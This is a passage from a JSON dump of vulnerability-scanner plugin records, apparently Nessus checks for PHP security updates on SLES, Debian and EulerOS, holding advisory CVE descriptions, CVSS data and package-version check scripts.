reference:\"php53-curl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dba-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dom-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-exif-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fastcgi-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fileinfo-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ftp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gd-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gettext-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-iconv-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-intl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-json-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ldap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mbstring-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mcrypt-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mysql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-odbc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-openssl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pcntl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pdo-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pear-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pgsql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pspell-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-shmop-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-snmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-soap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-suhosin-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvmsg-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvsem-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvshm-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-tokenizer-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-wddx-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlreader-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlrpc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlwriter-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xsl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zip-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zlib-5.3.17-48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:21", "description": "- CVE-2015-6831 Use after free vulnerability was found in unserialize() function. We can create ZVAL and free it via Serializable::unserialize. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely.\n\n - CVE-2015-6832 Dangling pointer in the unserialization of ArrayObject items.\n\n - CVE-2015-6833 Files extracted from archive may be placed outside of destination directory\n\n - CVE-2015-6834 Use after free vulnerability was found in unserialize() function. We can create ZVAL and free it via Serializable::unserialize. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely.\n\n - CVE-2015-6836 A type confusion occurs within SOAP serialize_function_call due to an insufficient validation of the headers field. In the SoapClient's\n __call method, the verify_soap_headers_array check is applied only to headers retrieved from zend_parse_parameters; problem is that a few lines later, soap_headers could be updated or even replaced with values from the __default_headers object fields.\n\n - CVE-2015-6837 The XSLTProcessor class misses a few checks on the input from the libxslt library. The valuePop() function call is able to return NULL pointer and php does not check that.\n\n - CVE-2015-6838 The XSLTProcessor class misses a few checks on the input from the libxslt library. The valuePop() function call is able to return NULL pointer and php does not check that.\n\n - CVE-2015-7803 A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash.\n\n - CVE-2015-7804 An uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name '/ZIP' could cause a PHP application function to crash.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-09T00:00:00", "type": "nessus", "title": "Debian DLA-341-1 : php5 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libapache2-mod-php5", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter", "p-cpe:/a:debian:debian_linux:php-pear", "p-cpe:/a:debian:debian_linux:php5", "p-cpe:/a:debian:debian_linux:php5-cgi", "p-cpe:/a:debian:debian_linux:php5-cli", "p-cpe:/a:debian:debian_linux:php5-common", "p-cpe:/a:debian:debian_linux:php5-curl", "p-cpe:/a:debian:debian_linux:php5-dbg", "p-cpe:/a:debian:debian_linux:php5-dev", "p-cpe:/a:debian:debian_linux:php5-enchant", "p-cpe:/a:debian:debian_linux:php5-gd", "p-cpe:/a:debian:debian_linux:php5-gmp", "p-cpe:/a:debian:debian_linux:php5-imap", "p-cpe:/a:debian:debian_linux:php5-interbase", "p-cpe:/a:debian:debian_linux:php5-intl", "p-cpe:/a:debian:debian_linux:php5-ldap", "p-cpe:/a:debian:debian_linux:php5-mcrypt", "p-cpe:/a:debian:debian_linux:php5-mysql", "p-cpe:/a:debian:debian_linux:php5-odbc", "p-cpe:/a:debian:debian_linux:php5-pgsql", "p-cpe:/a:debian:debian_linux:php5-pspell", "p-cpe:/a:debian:debian_linux:php5-recode", "p-cpe:/a:debian:debian_linux:php5-snmp", "p-cpe:/a:debian:debian_linux:php5-sqlite", "p-cpe:/a:debian:debian_linux:php5-sybase", "p-cpe:/a:debian:debian_linux:php5-tidy", "p-cpe:/a:debian:debian_linux:php5-xmlrpc", "p-cpe:/a:debian:debian_linux:php5-xsl", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-341.NASL", "href": "https://www.tenable.com/plugins/nessus/86794", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-341-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86794);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n\n script_name(english:\"Debian DLA-341-1 : php5 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2015-6831 Use after free vulnerability was found in\n unserialize() function. We can create ZVAL and free it\n via Serializable::unserialize. However the unserialize()\n will still allow to use R: or r: to set references to\n that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code\n remotely.\n\n - CVE-2015-6832 Dangling pointer in the unserialization of\n ArrayObject items.\n\n - CVE-2015-6833 Files extracted from archive may be placed\n outside of destination directory\n\n - CVE-2015-6834 Use after free vulnerability was found in\n unserialize() function. We can create ZVAL and free it\n via Serializable::unserialize. However the unserialize()\n will still allow to use R: or r: to set references to\n that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code\n remotely.\n\n - CVE-2015-6836 A type confusion occurs within SOAP\n serialize_function_call due to an insufficient\n validation of the headers field. In the SoapClient's\n __call method, the verify_soap_headers_array check is\n applied only to headers retrieved from\n zend_parse_parameters; problem is that a few lines\n later, soap_headers could be updated or even replaced\n with values from the __default_headers object fields.\n\n - CVE-2015-6837 The XSLTProcessor class misses a few\n checks on the input from the libxslt library. The\n valuePop() function call is able to return NULL pointer\n and php does not check that.\n\n - CVE-2015-6838 The XSLTProcessor class misses a few\n checks on the input from the libxslt library. The\n valuePop() function call is able to return NULL pointer\n and php does not check that.\n\n - CVE-2015-7803 A NULL pointer dereference flaw was found\n in the way PHP's Phar extension parsed Phar archives. A\n specially crafted archive could cause PHP to crash.\n\n - CVE-2015-7804 An uninitialized pointer use flaw was\n found in the phar_make_dirstream() function of PHP's\n Phar extension. A specially crafted phar file in the ZIP\n format with a directory entry with a file name '/ZIP'\n could cause a PHP application function to crash.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/11/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/php5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-interbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php-pear\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cgi\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cli\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-common\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-curl\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dbg\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dev\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-enchant\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gd\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gmp\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-imap\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-interbase\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-intl\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-ldap\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mcrypt\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mysql\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-odbc\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pgsql\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pspell\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-recode\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-snmp\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sqlite\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sybase\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-tidy\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xmlrpc\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xsl\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T12:41:26", "description": "According to the versions of the php packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaws was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2014-8142)\n\n - It was found that certain PHP functions did not properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4026)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6834)\n\n - It was found that certain PHP functions did not properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4025)\n\n - An integer overflow flaw was found in the way custom objects were unserialized. Specially crafted input processed by the unserialize() function could cause a PHP application to crash.(CVE-2014-3669)\n\n - It was found that PHP move_uploaded_file() function did not properly handle file names with a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-2348)\n\n - An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-4022)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6836)\n\n - A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.(CVE-2015-6837)\n\n - It was found that PHP's gd extension did not properly handle file names with a null character. A remote attacker could possibly use this flaw to make a PHP application access unexpected files and bypass intended file system access restrictions.(CVE-2014-5120)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6835)\n\n - Stack consumption vulnerability in Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to cause a denial of service (segmentation fault) via recursive method calls.(CVE-2015-8873)\n\n - An uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application.(CVE-2015-0232)\n\n - A flaws was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-2787)\n\n - A buffer over-read flaw was found in PHP's phar (PHP Archive) paths implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.(CVE-2015-2783)\n\n - A use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.(CVE-2015-0273)\n\n - Multiple buffer over-read flaws were found in the php_parserr() function of PHP. A malicious DNS server or a man-in-the-middle attacker could possibly use this flaw to crash a PHP application that used the dns_get_record() function to perform a DNS query.(CVE-2014-3597)\n\n - A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-3329)\n\n - Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP before 5.4.42, 5.5.x before 5.5.26, and 5.6.x before 5.6.10 allows remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-4022.(CVE-2015-4643)\n\n - A type confusion issue was found in PHP's phpinfo() function. A malicious script author could possibly use this flaw to disclose certain portions of server memory.(CVE-2014-4721)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : php (EulerOS-SA-2019-1543)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3597", "CVE-2014-3669", "CVE-2014-4721", "CVE-2014-5120", "CVE-2014-8142", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3329", "CVE-2015-4022", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4643", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-8873"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1543.NASL", "href": "https://www.tenable.com/plugins/nessus/124996", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124996);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-3597\",\n \"CVE-2014-3669\",\n \"CVE-2014-4721\",\n \"CVE-2014-5120\",\n \"CVE-2014-8142\",\n \"CVE-2015-0232\",\n \"CVE-2015-0273\",\n \"CVE-2015-2348\",\n \"CVE-2015-2783\",\n \"CVE-2015-2787\",\n \"CVE-2015-3329\",\n \"CVE-2015-4022\",\n \"CVE-2015-4025\",\n \"CVE-2015-4026\",\n \"CVE-2015-4643\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-8873\"\n );\n script_bugtraq_id(\n 68423,\n 69322,\n 69375,\n 70611,\n 71791,\n 72541,\n 72701,\n 73431,\n 73434,\n 74239,\n 74240,\n 74902,\n 74904,\n 75056,\n 75291\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : php (EulerOS-SA-2019-1543)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A flaws was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2014-8142)\n\n - It was found that certain PHP functions did not\n properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make\n a PHP script access unexpected files and bypass\n intended file system access\n restrictions.(CVE-2015-4026)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6834)\n\n - It was found that certain PHP functions did not\n properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make\n a PHP script access unexpected files and bypass\n intended file system access\n restrictions.(CVE-2015-4025)\n\n - An integer overflow flaw was found in the way custom\n objects were unserialized. Specially crafted input\n processed by the unserialize() function could cause a\n PHP application to crash.(CVE-2014-3669)\n\n - It was found that PHP move_uploaded_file() function did\n not properly handle file names with a NULL character. A\n remote attacker could possibly use this flaw to make a\n PHP script access unexpected files and bypass intended\n file system access restrictions.(CVE-2015-2348)\n\n - An integer overflow flaw leading to a heap-based buffer\n overflow was found in the way PHP's FTP extension\n parsed file listing FTP server responses. A malicious\n FTP server could use this flaw to cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-4022)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6836)\n\n - A NULL pointer dereference flaw was found in the\n XSLTProcessor class in PHP. An attacker could use this\n flaw to cause a PHP application to crash if it\n performed Extensible Stylesheet Language (XSL)\n transformations using untrusted XSLT files and allowed\n the use of PHP functions to be used as XSLT functions\n within XSL stylesheets.(CVE-2015-6837)\n\n - It was found that PHP's gd extension did not properly\n handle file names with a null character. A remote\n attacker could possibly use this flaw to make a PHP\n application access unexpected files and bypass intended\n file system access restrictions.(CVE-2014-5120)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6835)\n\n - Stack consumption vulnerability in\n Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x\n before 5.5.28, and 5.6.x before 5.6.12 allows remote\n attackers to cause a denial of service (segmentation\n fault) via recursive method calls.(CVE-2015-8873)\n\n - An uninitialized pointer use flaw was found in PHP's\n Exif extension. A specially crafted JPEG or TIFF file\n could cause a PHP application using the\n exif_read_data() function to crash or, possibly,\n execute arbitrary code with the privileges of the user\n running that PHP application.(CVE-2015-0232)\n\n - A flaws was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-2787)\n\n - A buffer over-read flaw was found in PHP's phar (PHP\n Archive) paths implementation. A malicious script\n author could possibly use this flaw to disclose certain\n portions of server memory.(CVE-2015-2783)\n\n - A use-after-free flaw was found in the unserialize()\n function of PHP's DateTimeZone implementation. A\n malicious script author could possibly use this flaw to\n disclose certain portions of server\n memory.(CVE-2015-0273)\n\n - Multiple buffer over-read flaws were found in the\n php_parserr() function of PHP. A malicious DNS server\n or a man-in-the-middle attacker could possibly use this\n flaw to crash a PHP application that used the\n dns_get_record() 